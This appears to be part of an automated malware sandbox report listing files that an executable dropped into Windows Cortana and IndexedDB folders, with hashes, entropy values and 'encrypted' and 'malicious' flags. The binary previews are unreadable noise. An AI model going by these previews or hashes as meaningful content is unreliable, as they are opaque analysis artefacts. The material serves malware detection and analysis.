Preview:	.va.c....62[...@...Z.=...`..g ...^......y.T.s;Q..w5.g..R.q8..8..N...T..7E.c...L....<..l....@.jRH'QK\I..O...'.../S.j....+.Z..f.k.7.[.=....oW..5bA.?...w...p.....K/..U..iZ.b.:......n.X........g........w....DiM.@L....q....a......B_!.=E.)+.McN].maz.c..Rj..'#tvA.kDd.6=.u..2<.........X.2...>.c^.A.......x.;..!.y.x....l.K......GKR..L../...Q"I..=5..t-..rdX......`\|O1&`Gb.zZ.@,.P....j......Y.^...@...c...R.9_......._..D%(.Q..M;=....w.....X...q].d."..s..!.6J...v...m..J...%(...p4.@._D...&..z}9....,......o....r...~.r.......Rf....+.....`..S.m/.k....6"..\|...R>vg.h....=.J..s.T".^./H6eknzIw....#.K..r. D.!....;...B...6..W...t..Uf)]....O\|...T..Mz......])U....O..j./...h...q.0..k.4p...!..8.#....../e3x.1...e.~...-./.JE.)q.Se..0......a :#.....I...:..!...8.Jy.j....,......*....miw5..._..,V\l.v)...;./5b.nk........m[.jhP>..Q..X...V?..&.._...q?..7...F...... .?)&.(.8 ..y......7.4R.Cx.E.&...6+Y.w..r#\|..4.3.............2?0..S.[ ..E.................4.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	20299
Entropy (8bit):	7.989992156614581
Encrypted:	false
SSDEEP:	384:CcgsYSODwuHsgmknrUckdR0gMmu1ciSL06FMwJFPZUfRp3KrelI8SJ69m:UsYtwuHxrUPRN9iMewWK+I8SJ69m
MD5:	8A8CDA824314D3F823CD1514DF12D899
SHA1:	AB95F1580F2FA22AE7FCCBA3BC27E74343D1E09E
SHA-256:	0AD9B588032D3919E133CBBCA5261C3CE7508058947A6291A69269F8584B00B0
SHA-512:	8013365BB1BDBD50241286978F9AFD9782DDABEC3392F203E93B65F3F1CEFD572F702BBC142DB8C81F177C0D861C550BAA11B494319E57898C0AB8782EDE2CED
Malicious:	false
Reputation:	unknown
Preview:	..s...]..d.!....K..K{#.V.x<.=.qjf.....P;p@.oH..8^...>.>j#+O..,.e` .&..6.A-.pnM..a...6u.BpO.=....s..-N.,F.......t&q...O..i.......3s.~.[i.<.e.'C{{.-..{....1Sa./O..X.O..Y.=^...~...(...Y.Q..V$g..3\|}.Z......n.B2\|.SBt.R&.....Zj.]... ....m......L;...5L....f'V?$4]+..(I..<....].lu..x.O.?2...<...d....`..+#g..%.5^:Cr%...O5.....4...N..:H..........[Ur...`......R.p.G..MHZ.g{\|.^).....y....v.....F..3S.n.. ..`.p..3H.qc....C.Z...Y.&..G.N.3..\|...){...........N.....p.{. $QY.`.b.kc.D.dZ.Z.Q.`.......d.....F./`9:-.M[...p.g..D/yC\|..a.....1N...Q.h,>...>1.a\|.gZA...)........$-. ....x.../.f..q..'.y....T.T..y.r.{b."K.m"T..3.....pZ.M1......%1..c.J7!q../..=......z.@=.['......XG."....b>Y...>......2..EWAQ^.....M.l.o...,..E>...Y..T...p....W32.......zy..k.4...-.OR[.2.f0(.~%.t.1.e....aSa..W..".-.M.r.Q.....TbH..4...3.=...A..<f.u....x$_.f.U`i7.]6Y4.[.'i\|.V.3{ns.%jJ..A..J!.`7.t.v.g..:...........L.D.ZF..am.H..H..y.fp...R..L.$I.=.8d..u.Z.W..L...c...i....=.AR.qO..TMm...I...d.T

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	7.887603085555684
Encrypted:	false
SSDEEP:	24:X12HpIT2bbT7+nMnoSkiAJXRaMwSx4FaC7m5AHDmvx6fr3ktqrmUnNaWivT99Mc8:X12HC2vPojlxAJEIIx63OYhfibeND
MD5:	A9A8B8DA65F2D4E616210EBBC919091F
SHA1:	8B2DEFEB601E15FEAB0A8915F845029D1F043368
SHA-256:	75278F21635BBABD9F7FF08C94308CA43960CE09339F9341B0A72495EAE10627
SHA-512:	06276F0F44CFF75B9C9A0D493D8DF2CFB834978ABDF4490BE5849C269DEA7BB4A886BBD0C84B2C2C0F10C3D1EE80A8E804B763206401271CF03C086F33268E68
Malicious:	false
Reputation:	unknown
Preview:	.z{........n....H.......pkqs.s+.\..\...P.........'.S\.xLBf..mD.11V.....B.....F.V.i._G@.....x...U..._bW%d.. ..2D.gl./.FQ....Io.c.O...;V.4H..........@i.<.ln.}..L......K.o.'6y^..2.Z.>.u.v...H..y..3.3.Ok[..mo\nHtJgG.L5k.....]..6...u..1.3.c.k..W....w62......En..:Le....u..n..KJ..e...YE..Z.`./...O.{.Q.ab.8\|..m...R9d...\v.d...15+&..g...V0...4....5.`u...t..w$.n..f.]........U~...n'.."0....X.bH..".E...,M.._...Q.u..........l.:.....B...J.b...G.f_..k1$..G.7.....O......L...'./<if4..CiUD..d...3.WO.+D!....J ...=.......d..j....X.C...O..z.......u~..9...`"BT!........9.<.....lC...fP.r.]#w..cb....Ub.Sc...vN.\{8.-]v.%h!c..e.Y^.x+.i.......&(...U.g(#..'/.l...C....Sq.c.E?..IV.!...`"]...&.2...P...7;+.%..m....qI.....[.B..O.{sJ...f...B.5-..@.W..g.....K`-%0F.......OZ....]>......r...}AR..l\|..n...-..r...]=.H........9...\..z...z^...:h..K..*.G\.}.W.Z.....>.l.KrI...%..@..j.\|...4...,.`...?..i....G......p...ctW,.'S.=.:..,.T.Fl..+E.e..,~......g.~.....S,......^..f..k..).U.....+.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	35246
Entropy (8bit):	7.994439210811086
Encrypted:	true
SSDEEP:	768:QvbVT1P+MnhJqF7L2VD0MzlNuwjl6QdQnkQ3J4+G0+jvdI:QVAMhJqcQQdQkIJ4+PgvdI
MD5:	A88B3AD94E8BF160A8CF09BA47817F03
SHA1:	6C1999519C666864ACD7999D0CFEFF2C549439CA
SHA-256:	B0487EB7ADD6EE328623C65DC2D78AD24A13FB56953F62B3C6015DEF15A17786
SHA-512:	0FAB159CAC5E3160A7E236EE3CED7CC409BF0A463669998D600FD7F2338D7D2E4134CED5339CC006A0A1FA2E56FF8D2D24D6C0401F1E1C0F4D7A02E931365656
Malicious:	true
Reputation:	unknown
Preview:	.va`.UpB}...G.Y.B..2[8.P.^6..._..-...].P\..-....q...T..4..\|.....*t.....g3.'6]......S...v.x....... .]5m.......d.....".?3...A......u..U..W.P.4>&NRH.;.n.....[\...^D..;.1...>.8.E..T.B..`.HR7..#.<...(.....2x.24S.=.vH.t..&.Z.....T/.Z..Z..&.._...93$o.N..?#.K..G..v.=..g....9N..2....e....d....(L.L....-$..a.Pl.....G+o...[k.T.z...............>%.:]."L..Q.......{\ N....:q..P!J.../.o..S..J.....Q.+....>..R../..=.....[...;G1./5.....:.q.BSL.Z.#...j5.L!j@..9ej...J.:T.....Jq",.K....[T1.g..+.....a.a.2......0..eu..C..fKOT6r.Fo....5.G..$.x!...^......P.@1..He_.\|.m.t;7.}....1....%}...?......pj^gxK.+....5..Y..}ab."........n.m33.....:...KY.........4.CgaT#.>..v-..R7...!...,0`.U.wom..H...eb.Ul#D%.T].@.;...>..x....`.Guo#8.t.B.w/9..Q.b.\|.....&..^..'6.....\.. ...W3.z.Q....&.66~. ....j,;qL.oJ1.sf.EG...:C.'.,..........a...\.P.2..G.#...1..;..8.t..}.O.uE.z.....=.x.da^.db.,oW.....<...Y...CZpl}y...K..7..Xu.(......{_6.]...f.......v.B.1.$..?.V..5.b#.\|\..o.g:.Y.<..n

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	18979
Entropy (8bit):	7.9912158266901026
Encrypted:	true
SSDEEP:	384:Lgk4wrMIui5SGccW97LTYIWC4TWCWJy1XLyrdQeb7KJMtJ3lxvf6yQt2Xb3qdFa:Lgkf9cZ9rYIr+IJeemm7KetJLvNQEbga
MD5:	A383B5DAC2D4A7809D7803416E4CD966
SHA1:	9281704C3D55D4BA091A962B19BEB1ECC268A6FA
SHA-256:	59C21E06889356E03D267A982A7C82234A6F76B29D39230C0D0C33A7F7476BC1
SHA-512:	AEED1099E5CEA2DC62CD2BE5F47D2AEF5510AA7086DDEE42279AEC2543483581D0174EBEB13E61AA87CA7D3F3DB06687C1C89A3E2AFE5BE8776D947DB8328D85
Malicious:	true
Reputation:	unknown
Preview:	.vaZ1/...M4.'..S...(84...M..7).h....<f...B.H.nM.b.....%5.A..g..C...&..p=..DY...Pe.;.:..c.X.8.....1.6Si.7.1...}.b!1D..j%......=&.c..5.Z,.z...?c....}.X..=......l.....X.M.........?..,gJ......os...+@...k...l..;...\<.....> ~.&Z...PQ.y..s...t...)#zh6\?.W.........>abA.zc.....>...0A6Z..l...e!3R.V.>p.......8..JX..s..........e.......6.K.`....U..Xvg-......E.e...',O.:.{$.J.".5..!..hs`.:....].a...o...S.$...k.>.u.K.zO...X...u..qX..6..Tr.@+..A.6...eE>..U....d..T..E..w\..Z..D/..v..h.1.\&...w..pk.....4_T...^...........+<..2....8......=yb..~...6.........[..W....N.~.....m.".v6.X..#>........."......~a...]>Y.=....3..^..^}[....AzVE..l.q......^U....Rgj9.voRY..8m.Y..`....>.f...Q.'.W-.^z-0D...q./.d..d\..O.'.5GF.y...x.E.a7A.W3.....z}Q..).....%..0e.0..v..'.j.r...G.8!3{nFwa.......a.`.w.F....?.Qdo'./._G...?.L;p.K.....K.fY.T....V..,<.G-.l./.../.\.F....t.~...........i.#.;.....0d.....]:=`..R..w.h.-..'.o]h?.....'......a.9....@....-.#.U!.].Dj,~....o8.....g.N.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	17782
Entropy (8bit):	7.989223147015063
Encrypted:	false
SSDEEP:	384:RY/f2WPGp0Lf1mtjdGT5WDtCA/cAqU7yJg9jwRFBAKh:meAGp0Lf1YGtYcA/cAqUuJg9jKFXh
MD5:	684366A32B8D4067C9D0E8730E38B4B1
SHA1:	A0B2B5C354A3DFEBA89D2E1A3035151BB85C5876
SHA-256:	A1531B44A4F48657594F15F4B2381175C63A01CAA27BC6DF191AC5CD2FF3B72B
SHA-512:	4914370FFD13E3A20313F82F224DC7CC22363070FC7FFC3AA2342EA6B4CB63A0FDC15B457DDF33C04C86505024CF91D63EA7FE28D3F27E2317B07A7D684324EE
Malicious:	false
Reputation:	unknown
Preview:	.!f.=0;.u ...b.-....56.e..5..<..H.O.6...........C.2=-..b....K6i.:...+;H.X..O..._5.4..<..]U..&/.Nl#....x.J.C)...S.v.#...Y.w%...j7M..cB.....U...6.Q3.J.R...x/.t.zE[.........k3.!A'.b5c.~.L...o..q&..GX...)..{D.m....D..u.....H...2'(?.g.....A%.#...C>.=C]G...3NY..../d.M.R.k"6...#.r.....p..{jh.^F...V..}..0...8...j...~.q....Q...U._..n3......`[.P>..P.w.+.t.c^&.t\..B....`...Ou.v".3...)..M..'G..*.\|#.5...'8..r..r..m.P".I.#.......k......j..[......=.U...R......$...6.....n.6.a.4..X..S\...1z...j..h..9B..F.VE.M<....Z...d...Wr..J...V.{Q.R.....?.R".._...Y.Y..s.?..;.d...>.4w1B#.F.E....E...l.I.N\|.a.....l....n..?#=a........)C@_cLpEP?A........F..N.0.m=........&x.z.J.L..J....5.\/....'..8....p+.......Q.....v[@...EI..n.......i....&.N....8=+...l.5..e....<k.'.}...X5.;.....!....a?.u).....E....x..?....... ..D...H.~yc.....D......b..;..]-...(....r...B9..w......w.M....l..r..]..J.Y....g.E?Ei..y.7..SswP..&H......8.X.A.CT..m.k..cD...5^....r.`Dv..g8.]M..0..]......Bo%.m...\..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6399
Entropy (8bit):	7.970930601605299
Encrypted:	false
SSDEEP:	192:ov06pCAJPYktj/BuhX8ho8Hxl+sHAdzpGJ82dzRmIhrVDU:ov3LPYG/Ihslxkzpr2dz8GhDU
MD5:	FBBFECD5046BD76F288BBEB3AAC4BB55
SHA1:	064250D2167D12EF6A1654BB16FD91D530BCD01D
SHA-256:	AA8FFAC81C7F6035BCFF2AC87E5FC4A294113D457F765BD14536F3EB22FEE1D7
SHA-512:	9637CEB6BDC337130B04A5BB01AD42DD32E42A0749A11F1D828F791193697F1C94F4DB21D567218B656E97D6005F457DADB09D31E8FA1EA1D06F69417A948F37
Malicious:	false
Reputation:	unknown
Preview:	.PNG.I..n...R<E.. .....{..o}..ef....\P.......{nh.].J..&...g....o..+..HA.5.E.Q.....Cq..V....`.PdM...F2]=,..N....R4t...a.cO...x./.^g....n..%&..n..r...BH.WW.....x?e..y.A7....RzW..L.....j.m..>.P>B.....Yt......]..w%.m9.p..A.Q..?.x7&..%......X...g....J..d.h....V.1P....P.....X.....V.X.......:.6....f.xU._.Fz.....X...B.aG.j...=..'I.Kw\|,..Y;.. ..n.....{....../.O...k.5f.@.&...S.......N.J>dp..9....t7.h..."...x....t.Z..fv....+.[yN.....q`=Vw.<v...S2..9S...;..q.../..f..l..eB\|.n.!J&Ih".......};.f.. ...=....$.R@...+6....p._?.r.J.....!......4hD...x.....wW..s.._.-o3..........w..66.G../>...~9\B.;.y.u.........~....K.......r..=.\..k.b.Q).....q..V..B..1.\D...D.p....i....@RR..\.Q.U.........._.v...S.n!.d...P..u.cD.k@;.AN.......~.y.G YRR...D.F.X............^66... ..%`Yu./3......_...b..C..(.......}$.../.Kv..'......P.:.E:$..}.#.\|`...r.F.$..`..k......{.....%3...........v.;..2v.p.VJ..d.K..........e.7.^.p..+(..j?...)....$.....\B../...x....<.I.X._\c.O.%....4d...R...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\appcache[1].man

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6953
Entropy (8bit):	7.975579692745166
Encrypted:	false
SSDEEP:	192:bpjJCr9Iq0gsXMa3q2p8p6qbHYsC8PxtwSoTq:bdgr9Iq0VMa3E/PzwSt
MD5:	52F5FB4654926E43A0E2056DD858A103
SHA1:	DDF854A573F9D96B1583B3E7ED7FBB0B81445C20
SHA-256:	B9C7522B1D5E8F1B0E43C676B57B7B4503994AF75350C78EF2E6489D7D47E7FF
SHA-512:	6A66F651A7099558E3ED9F2353B67B38DBA3414866ACE4F2855481FD38680F6C534FF1D1FC36D4E8CB9008A3BC092BCCFC942DFCF8B60982B716ABED9444B023
Malicious:	false
Reputation:	unknown
Preview:	.CA+....?...^.\|..7....W....Y....y....!.%..Y...g.s.n..=.3."(.h.}..."M..L.bI..9}.V.-.&rIJ....R...W......Epm~E....m....'g.+.......h.>4.{.fU.i..i.'...%d....Eez..v.}pH....z.i/.}...J.#........?.g........&h...WX..+.N.i....6.Zt.0.1-x:..uq....`.@"..6.z.+7..n..bgN....._...,lZ..F.'...o......FQd........."\|y.Ko..r.....n......>....Q....4...>.....ry...f..f...J.I,U:...o....w.[4\|...b.3b....z'R.y.RQ?..B.O.0..._.m.Y}.......l..7...`f.x.3..>...&d...#.r..r.............$.}..+g4.....~?.><..H.S.h...[...8.....Qddl.m.q.5 6...b..C6.. A.!..qD@jON.c.... .....??.Ksiw!...`>Sh.fOn~(,....aU.......}#..D."eQ..R./.....&8.(I..8...IO....W.i..\|.....s.0.....O\....L..........q.C..}L.......}.QY.fx...#...H.\............WIb.2.x../.'..kn.4..e.P.n..R..S.K..}:..4....qU4{Ev.D..<.Q..5.B....o$.+.i..`.P.Sj..8......c.c.d......$......?....\|......"._.,N...W...\|..s... .K............$.....m....-...(.MR.@..'j.H.ge........Rp....6$..\Ps..c....i.A...g..g...0...\|8.g.......N..3.Z

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\GA0XG3F1\www.bing[1].xml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	143140
Entropy (8bit):	7.998759625867218
Encrypted:	true
SSDEEP:	3072:h1JlFS3VRxy34vkETJwXOK0/vFgHCcGbXkIMVO:dlklK4vkEdwXoh
MD5:	459C8FA74BA74AF95BC30E80BD002D05
SHA1:	70F2CF7F52E904612CC04666AA612E9548737181
SHA-256:	458ACB36E6786D095C2AF4AE381F9994C7E857AB72FEBA5AFB164635D2CFC496
SHA-512:	83E97AE75A10E7721C081F90ABA23AEC1F33ACEB0EB37AF9E18B728C9F12A3B2AC823281B6FCA005C74DC451FFD664DC3FCA945A5C10EDB270A2402FEF6553F6
Malicious:	true
Reputation:	unknown
Preview:	<root.a6........T...j;E.m...,..n...-JI....B2K.\?.%.......}........>k.9.............\|7..M$.V.t...OP4>f..[;.pf(....cj..G$.R$.....].WK..U..K..)}..$..W.....:']..#....J.7.....z.fL.....D....\X.(.._.......\|......../(b..I.\|....3-.R/.KrYX~............FT).8...wn....p......6...........O.j...W.~........i..{..........`.;..B....0%DX...X..Zw..R+MunP.<6.G.K.("..w.\:y.#O..m&...f..W.>E...m~......L2h$....=......6G.B.c.-H..M.U.....'.....IF..+...G!Kgq..."..Kv91FJ.....1$...6k.?....b....p.2lc....?.>..wZ.)sO(r.....&.Q....!Bhs...S'...,cV\|#........H..~...Y^.RT..&1"~..e..g.E..+6.`...A....."+5...7..y.b..-.........U..... p..,.xb.^7`N..7.WYMM\|....X......<(.>cu....B[E.4!........Y......q.n..bb.....l...........9..J..A..>.H1..V...e......J.\..6-CB...."K.?._.T...X.%9.b...,.8......5...Y.t.Cp.v...._..MgQ.v....p..............$.8.^..Zj8W*.h...+...]....._2.......<..Y..sZ..9...K...4..k'.dO."....n.3%..U>9..Q...VpB.V.........>.".Lt..W..X....Y.8.5...n.h_o..q...-L.[.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	2621774
Entropy (8bit):	0.8746877162581448
Encrypted:	false
SSDEEP:	3072:rxMrQAFEueqozLxwE/QokUzumYJEQodqxkrio8a4l24PoPrifMaxKUaxs:CcAqDLdL/SmYJRoGY6oPriuY
MD5:	D6C0B32C94C5360410843FCA75E789B8
SHA1:	EAF358A845E6BD3FFB0523DC2511F283C2E1A197
SHA-256:	3E643B583C4454B8365CCD64AD5A3C9E2F5244E45F5213641EB104D4510897AF
SHA-512:	650F8B6BC0E9B69A327C5CAF0AB0F33896CB03C83B254D982E41EA79136E24BA5B54E8CBD02CF4AF38AD7CD4C19523DB565F1B315FE788C77FAA7CF464177F43
Malicious:	false
Reputation:	unknown
Preview:	V.m....$.pV..'4W.T....GLK9..t0D.......+d\.E5.zA....:.H..R....m.......} ..C......DA.........)......,...1../;.P.....T.%{..o.MTV...y.K...1.\...3!..S...i.B@.l....7G.5.."Y...([..N.U..W.........S...R.....z!3.J.QB......376.C....L.^.....D....9......nW7..f.....c..........k.3E.=.;..?y".X...0..w..`,..q@AW`0,...DZ.>.F.Z..F..Q...W..u...7..KV.....)0../L.}.1.&.}...?.L.:f..dn.......N.~s......:..H.g......G.f@b.R.i.C).V9.g..f.s.........0...g...-R...-..._.K.Dz.a....:..D.?.[.0..w...-..4:..:....%.L.Aw.e.3..6...e..Mo....&.. .}22..w.....\\|._......<k?.z5.]...Z3..!.q.P..c\....f{c;.+.E._.Z}..i.........?6-.f0.Bf.~...gH.........}.g..$K....>x7X..0<3d.a.....>.w...KX...g...].B.q..."GO..V.(......?7!..Z..........tYo.....w.k..x..ak.Y..R..G......x.UM.v.3...LN..OR....T.z>...1.N#...z.'........j..1P.e.\O.@4w.,.qR.dD.u.9b7....@&(..G'..5.^.Y..uj..70...e....`T.....A..0.....d.PF1O....?..%\|..u...3T.P}.lD.X..#..i..z...X#..VulaN..M......3.y......7.... m.E.".[4........a....0....e..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.jfm

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	16718
Entropy (8bit):	7.988649606047402
Encrypted:	false
SSDEEP:	384:vMr5KcNCv169/ubKYHbdDJpYw46iJ1tZO/Z7mDR:Ur5pNCbl7dTYz6T/Z7+R
MD5:	B5FF949DD4997F6933423829C129851F
SHA1:	F48A020BF423078FC8BE466E03F2946588B3462D
SHA-256:	247E42A4B6D68820A385427872325F477E8CB587D0BC265D4D653559252F3F29
SHA-512:	ECD1976C6A54298491675595609D7A362B694B43376D50C9D18EB76B81B7263C7638C3D5347D77FF982FA7102D84CE29895DB67B5E982F53AFA1FCA692F0D4F4
Malicious:	false
Reputation:	unknown
Preview:	..s..}qE..>;.o...........h...0~..O.&{...t.b..=.rm..V.3.).y/........x...-.<.:....8......x..#.y.....g...a\|"....&#.'...B...D..\....W.@..:(..._YtM./k..a..sbO.q{.....G..\|<....g....-[_.L."P...T.....}xY...R.. t..9...R.M.Q..$4....k..a.i^7..0......06...X.,.......t.G..?.(Xr}.4bq}...D7s}okP.L...kKX..bC......5O!>u..^E.!..c=.1T.L...U.LT....W&oN.....i.k&..s..].-........G\|..6N.b0.l....%.V.7.6..r.V.......k...k..N....MQ#~..U+..d.D...H.;]..0f.B.{z_(.Sn?....\q.Rfb...}...8j.`.. ...C.S=dS..\....K..U...(.T..m..Y.o>N...@......asJ...$.8...oZ.E'..Q.4<\|..%...8...p&.o:o.H+7..b.........<..n...-..E.}.z.k:..=..s.!?W2. i..]P..7.&.>...g....N.?.xE..O...=...t..}._[Xx.zj...kv.b...D.....D...DP..r.1<.HG4.....D.w..:..3.@......r2K{O.KHJ...479..0.a...Bt..y.l..K...r.....$#..y.'D...V.M..4.3...V&:.H...L..%....G.s;.i........"N=M.P...:.#...WW..A.......\.....9L...w.UK...CR..Oh.9..&...o^}.!e....R=.."...Z......A.K.............1.WR+..cLt..5.YO.v....\g.L....n..^/.....G..1..,%...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.chk

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976893003070554
Encrypted:	false
SSDEEP:	192:j6iZEcavsZp51IXDlTTT0yMpDP6gh+s+gjCupLGTAaz:j6/v0ATlTTobD+ij/yAaz
MD5:	6F7EC23F80AFA671480C745809BB2424
SHA1:	D06FDFD7BCAD1CA7FC566CE62D8979958E0C72D0
SHA-256:	22E85672170FA059A51AF9187E0A30048AB2D23AD4FA586F653464256338803E
SHA-512:	732F98C3EB16A81D84DB4F47695853167CCE3C9F93DA583FB599487AB18850D79F6B111F33F389976BF633421665E327E5F581C80A2F54AAF8A0134EE1FB8180
Malicious:	false
Reputation:	unknown
Preview:	...J..gI...=.../..hK.0.E.L.....).....z...:P....f.@.L[p.#.8.UO...r."..9.vl.)..'.....oa...1k....E..\|...8Q.a.l....Y#.t.bl`.L...'....T./.@`n...hz......9...y ,..No..u...C.K.%.U.......L!Q.....uL(.x...p..F..#..Uy9x.E......J......:c..Z..i..o..K..w..g...2..<.A.z....bn....3.V....n..zr9.$^K.0..."J.....R....?g.........8.&..O..{k..Zt..A.1...s`..,.2.... A.....ZCt_./R.N+5)l.S.?.H1.(+..iz.......l...G.m. G=zp....S8..X'~.W@...4Q.z.;..rtS...........K.Z....#WOW..~1..x.S^0....q..bl.@k....X..6...!..e.<..[...c..l6..X..D...meyWs=.f.,..e...<..S.o=" :..z.f...{6_z.E.`Y....&...7.e....6..}d.(..T..sp^...Y.....)Gu{..j.K.oY..qV...X...........g0.K.%..@.........n..p....+.!.8.tS.1.`.kc..c..7i....K...@.......'z.Z..j.I..?......e#k.s..@,....ap...\|.StJ.k.H..:..F1...%w.x.=.@...D.JuF..4...Y4'7.......>.M\A...7....3...+.....3.xK.h.q.A...d._...Du;..V.i_J%uP..W;...]P.\.....l........M..).I.\,.z.k.d....~...7.q...6.....A...q.0aA....!.I..0.a.W.%)...2...Q.=(..<. P......Q.............

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	3.3009426484212687
Encrypted:	false
SSDEEP:	3072:ZfTlWbB1/rG45fnelSpnMbzXoBaWaKe+Run0HjfyvzjDyl/eZAhV7f5e7l5ujtm:ZfTlW91pOSpnMbzYBpa0fyfQuKT5e7l
MD5:	DC9484F0D0ED350C5B6E2D5F20531107
SHA1:	9827EC9464C5A9361246E2914717ECB7A03D0BA5
SHA-256:	3EB9099D63FBF753E5A9BB400C716820285A4A5F4EE641BF0DA83C5A8E267A06
SHA-512:	D3D7FF4AD8F0D981A8043220138C6EB120A3CBC20775A167D81B19049452AC89EF111448669D66ED43BD8AF8EF7C69341355612344E153D7131283BBC3C350D0
Malicious:	false
Reputation:	unknown
Preview:	.....ar(.6.n...B.......=...\..:...<....5!...m....<D......y.r....-.F>?d..,}Q.........C.2.y...b...U.f.8v+b'.....aa.td...d.& .^GU.+.1.M...ah......^.....;W.....w=k..!)...>.7Z...=....q..;.r?#...S..E....."E...2.q..%...=.....(..r...9.e....=,....Y..{...:.A}....z.N..k......P.w..M..Y.a..9.......i.%...B..}...6..P.F....z.y.gw..?...0j...J..maK...7../..]VZ.x."K3.G. \|~...Z.X}.jJ.u..t.i...m.?s.8..iR..{....v.Z..2.k..j..Px.6,....q.nx......g.E.t.....@.X..af.....-.H...y..B...~....[.....Ab..(.e........._..8.D.....,K.j.......:-m.-.k.i.&)...lr.....=A..3`5N..Q.......6.4...N}=NS..Q.`.&......\Uzx......u.w.....#_...d..@.....;.._cU".{j.......z..Ss.......m...+..S.Z.W.J.V.-.]HHi.H.....7... ....T.Q.>0...E.CmdUp&.E.EY.qB....F.yE.%tFhs.b....9P....B..V..9...!.>..#..}.H\|.9..T!!..U.t....E5AV......^....c.9 ...`...W(\1..CWyZ.....Q..*.....},...H....NI...[......w....5H.H.3fO..RQ....]....%.q..w.....`.8.RV.._...7].u..._..r'..t..&......E}m.......z..2Y^`.T..m_;.k.x.1h..S.....

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbres00001.jrs

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	3.2077853867601975
Encrypted:	false
SSDEEP:	3072:QXGm5/Rj1+XfHZ33FO5go2PsGmwJo1aArGqtZt+VmPYBS:/m5/xWfHZlO5go2VzJo5rGaYS
MD5:	6CA88C2F018BB316E49C04972A3D63E5
SHA1:	CAE5EFCBDF6F8425BE80467C4E84DA4C4DF61C6C
SHA-256:	03BE4EB4F68F0F6541456D1C6D21A73CC3BE592A532A51CCC46BD17140464145
SHA-512:	477737DD5E58F495ACBA60F847BA04515F707B2EF7FF84842A0F3E91AEEF1F1878C78A434AD5FC9F19BE554EB0F11BD30A1EEE2F4E222AC0AEC339B63EB41DB5
Malicious:	false
Reputation:	unknown
